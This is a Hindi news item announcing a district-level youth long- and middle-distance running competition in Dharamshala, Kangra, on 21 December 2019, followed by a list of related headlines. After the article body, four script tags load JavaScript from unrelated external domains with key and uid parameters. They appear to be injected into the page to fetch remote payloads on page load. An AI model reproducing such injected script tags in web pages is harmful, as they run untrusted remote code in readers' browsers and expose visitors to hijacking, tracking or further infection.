<p>कांगड़ा जिला के युवा धावकों के लिए धर्मशाला के सिन्थैटिक एथलेटिक्स ट्रैक में 21 दिसम्बर, 2019 को जिला स्तरीय लम्बी और मध्यम दूरी की दौड़ प्रतियोगिता का आयोजन किया जा रहा है। यह जानकारी देते हुए जिला युवा सेवा एवं खेल अधिकारी सजंय शर्मा ने बताया कि इस प्रतियोगिता में जिला कांगड़ा के 13 से 15 साल और 16 से 19 साल के आयु वर्ग के लड़के एवं लड़कियां में भाग ले सकते हैं। शर्मा ने बताया कि दोनों वर्गों में पहले तीन स्थान प्राप्त करने वाले प्रतिभागियों को नकद पुरस्कार से पुरस्कृत किया जाएगा। प्रथम पुरस्कार प्राप्त करने वाले प्रतिभागी को 6000 रूपये, द्वितीय को 5000 रूपये और तृतीय स्थान पर रहने वाले प्रतिभागी को 4000 रूपये पुरस्कार राशि दी जाएगी।</p>
<p> उन्होंने बताया कि 13 से 15 साल आयु वर्ग के लड़के और लड़कियों के लिए 3000 मीटर और 16 से 19 साल के आयु वर्ग के लड़के और लड़कियों के लिए 5000 मीटर की दौड़ का आयोजन किया जाएगा। 13 से 15 साल के आयु वर्ग में भाग लेने वाले प्रतिभागियों का जन्म 1 अप्रैल, 2005 से 31 मार्च, 2007 के मध्य और 16 से 19 साल के आयु वर्ग में भाग लेने वाले प्रतिभागियों का जन्म 1 अप्रैल, 2001 से 31 मार्च, 2004 के मध्य होना चाहिए। प्रतिभागी को आयु प्रमाण पत्र की मूल प्रति या सत्यापित फोटो प्रति व आधार कार्ड या किसी सरकारी संस्था द्वारा जारी फोटो प्रमाण पत्र लाना अनिवार्य है।</p>
<p>इच्छुक धावक अपने मूल दस्तावेजों सहित जिला युवा सेवा एवं खेल अधिकारी कांगड़ा स्थित धर्मशाला के कार्यालय में 21 दिसम्बर, 2019 को सुबह 9 बजे तक पंजीकरण करवा सकते हैं। खिलाड़ी धावकों के लिए जल-पान की व्यवस्था कार्यालय द्वारा की जाएगी। उन्होंने बताया कि प्रतियोगिता में भाग लेने वाले किसी भी खिलाड़ी धावक को यात्रा भत्ता देय नहीं होगा। अधिक जानकारी के लिए कार्यालय टेलिफोन नम्बर 01892-222317 पर सम्पर्क कर सकते हैं।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1576479958329″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Shanta Kumar road accident prevention: पूर्व मुख्यमंत्री और पूर्व केंद्रीय मंत्री शांता कुमार ने केंद्रीय…
Ballot paper elections in India: हिमाचल प्रदेश के मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने देश…
Tragic Road Accident in Sirmour; सिरमौर जिले के पांवटा साहिब की तहसील में आंज भोज…
Mumbai: अजित पवार गुट के NCP नेता और पूर्व विधायक बाबा सिद्दीकी की शनिवार रात…
Kullu Dussehra Begins: राज्यपाल शिव प्रताप शुक्ल ने रविवार को कुल्लू के रथ मैदान में…
International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…